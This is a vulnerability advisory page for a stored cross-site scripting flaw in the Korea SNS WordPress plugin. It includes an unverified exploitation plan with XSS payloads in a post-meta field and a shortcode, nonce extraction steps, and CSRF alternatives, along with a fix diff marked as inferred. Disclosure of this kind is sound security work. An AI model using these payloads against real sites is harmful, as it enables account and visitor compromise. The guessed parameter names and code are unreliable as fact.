WP-Safety
CVE-2026-39667

Korea SNS <= 1.7.0 - Authenticated (Author+) Stored Cross-Site Scripting

mediumImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
6.4
CVSS Score
6.4
CVSS Score
medium
Severity
Unpatched
Patched in
N/A
Time to patch

Description

The Korea SNS plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.7.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Changed
Low
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=1.7.0
PublishedFebruary 18, 2026
Last updatedApril 15, 2026
Affected pluginkorea-sns
Research Plan
Unverified

# Research Plan: CVE-2026-39667 - Korea SNS <= 1.7.0 Stored XSS ## 1. Vulnerability Summary The **Korea SNS** plugin for WordPress (versions up to 1.7.0) is vulnerable to **Stored Cross-Site Scripting (XSS)**. The vulnerability exists because the plugin fails to adequately sanitize user-supplied in…

Show full research plan

Research Plan: CVE-2026-39667 - Korea SNS <= 1.7.0 Stored XSS

1. Vulnerability Summary

The Korea SNS plugin for WordPress (versions up to 1.7.0) is vulnerable to Stored Cross-Site Scripting (XSS). The vulnerability exists because the plugin fails to adequately sanitize user-supplied input when saving post-specific social sharing settings and subsequently fails to escape this data when rendering it on the frontend. Authenticated users with Author-level permissions or higher can inject malicious JavaScript into fields (likely within a metabox on the post editor screen), which then executes in the browser of any user viewing the affected post.

2. Attack Vector Analysis

  • Vulnerable Endpoint: Post update/save endpoint (/wp-admin/post.php).
  • Vulnerable Parameters: Likely parameters prefixed with ksns_ or korea_sns_ (e.g., ksns_title, ksns_description, or ksns_url_custom) provided via the post editor metabox.
  • Required Authentication: Author-level (PR:L). This role has the edit_posts capability required to save post metadata.
  • Preconditions: The plugin must be active, and the "Korea SNS" sharing buttons must be enabled for the post type being edited.

3. Code Flow (Inferred)

  1. Registration: The plugin registers a metabox on the post editing screen using add_meta_boxes.
  2. Input Collection: During a post save or update, WordPress triggers the save_post hook.
  3. Data Sink (Database): The plugin's handler for save_post retrieves $_POST values (e.g., $_POST['ksns_title']) and saves them to the database using update_post_meta($post_id, 'ksns_title', $value) without using sanitize_text_field.
  4. Data Retrieval: When the post is viewed on the frontend, the plugin hooks into the_content or wp_footer.
  5. Data Sink (Output): The plugin calls get_post_meta($post->ID, 'ksns_title', true) and echoes the value directly into the HTML without using esc_html, esc_attr, or wp_kses.

4. Nonce Acquisition Strategy

To exploit this via a direct HTTP request to post.php, a valid _wpnonce for the post edit action is required.

  1. Create/Identify Post: Ensure a post exists that the Author user can edit.
  2. Navigate to Editor: Use the execution agent to navigate to the post edit page: /wp-admin/post-new.php or /wp-admin/post.php?post=ID&action=edit.
  3. Extract Nonces:
    • The primary WordPress nonce for saving posts is located in the #_wpnonce hidden input field.
    • Use browser_eval to extract it:
      document.querySelector('#_wpnonce').value
    • If the plugin uses a specific nonce for its metabox (e.g., ksns_nonce), extract that as well.

5. Exploitation Strategy

Step 1: Authenticate as Author
Log in to the WordPress instance with a user assigned the "Author" role.

Step 2: Identify Meta Parameters
Visit the post editor for an existing post. Look for a metabox titled "Korea SNS" or similar. Inspect the source code of the inputs to find the name attributes.
Assumption for Payload (inferred): The parameter is ksns_title.

Step 3: Perform Post Update with Payload
Send a POST request to /wp-admin/post.php to update the post metadata.

  • URL: http://localhost:8080/wp-admin/post.php
  • Method: POST
  • Headers: Content-Type: application/x-www-form-urlencoded
  • Body Parameters:
    • action: editpost
    • post_ID: [POST_ID]
    • _wpnonce: [EXTRACTED_NONCE]
    • ksns_title: "><script>alert(document.domain)</script> (Payload designed to break out of an attribute or tag)
    • post_title: XSS Test Post

Step 4: Trigger XSS
Navigate to the public URL of the post created/edited in Step 3.

6. Test Data Setup

  1. Plugin Installation: Ensure korea-sns version 1.7.0 is installed and active.
  2. User Creation: Create an Author user:
    wp user create attacker attacker@example.com --role=author --user_pass=password123
  3. Post Creation: Create a post as the author:
    wp post create --post_type=post --post_status=publish --post_title="Vulnerable Post" --post_author=$(wp user get attacker --field=ID)

7. Expected Results

  • Storage: The update_post_meta call should succeed, storing the raw <script> tag in the wp_postmeta table.
  • Rendering: When viewing the post on the frontend, the response HTML should contain the unescaped script:
    <div class="korea-sns-container" data-title=""><script>alert(document.domain)</script>">
  • Execution: The browser should trigger an alert box showing the document domain.

8. Verification Steps

  1. Check Database via WP-CLI: Verify the metadata is stored without sanitization.
    wp post meta list [POST_ID] --keys=ksns_title
  2. Inspect Frontend HTML: Use the http_request tool to fetch the post content and grep for the payload.
    # (Pseudo-command for the agent)
GET /?p=[POST_ID] -> Look for "<script>alert"

9. Alternative Approaches

  • Metabox Bypass: If the plugin doesn't check the nonce during save_post (common in older plugins), the update could potentially be performed via CSRF or a simpler request omitting standard WP parameters.
  • Shortcode Injection: If the plugin provides a shortcode like [korea-sns title="..."], test if injecting the payload into the shortcode attribute triggers XSS when the post is rendered.
    • Payload: [korea-sns title='"><script>alert(1)</script>']
  • Direct Option Update: If the "Author+" description is slightly inaccurate and the vulnerability is in the global settings, try updating options via admin-ajax.php if the current_user_can check is missing or weak.
Research Findings
Static analysis — not yet PoC-verified

Summary

The Korea SNS plugin for WordPress (up to and including version 1.7.0) is vulnerable to Stored Cross-Site Scripting due to insufficient input sanitization and output escaping of post-specific social sharing metadata. Authenticated attackers with Author-level access or higher can inject arbitrary web scripts into metadata fields such as 'ksns_title', which are subsequently executed in the browsers of users viewing the affected posts.

Vulnerable Code

// Inferred from research plan: Post metadata is saved without sanitization
update_post_meta($post_id, 'ksns_title', $value);

---

// Inferred from research plan: Metadata is retrieved and output without escaping
$ksns_title = get_post_meta($post->ID, 'ksns_title', true);
echo $ksns_title;

Security Fix

--- a/korea-sns.php
+++ b/korea-sns.php
@@ -unknown @@
- update_post_meta($post_id, 'ksns_title', $value);
+ update_post_meta($post_id, 'ksns_title', sanitize_text_field($value));
 
- echo get_post_meta($post->ID, 'ksns_title', true);
+ echo esc_attr(get_post_meta($post->ID, 'ksns_title', true));

Exploit Outline

1. Authenticate as a user with Author, Editor, or Administrator permissions. 2. Access the post editor for any existing post or create a new post. 3. Identify the 'Korea SNS' metabox and extract the current '_wpnonce' from the post editor's HTML source. 4. Send a POST request to /wp-admin/post.php with 'action=editpost' and the target 'post_ID'. 5. Include a malicious payload in a metadata parameter (e.g., ksns_title="><script>alert(document.domain)</script>"). 6. View the published post on the frontend to trigger the execution of the stored script.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/185d380e-7e23-4260-bdeb-e88c8625f690?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database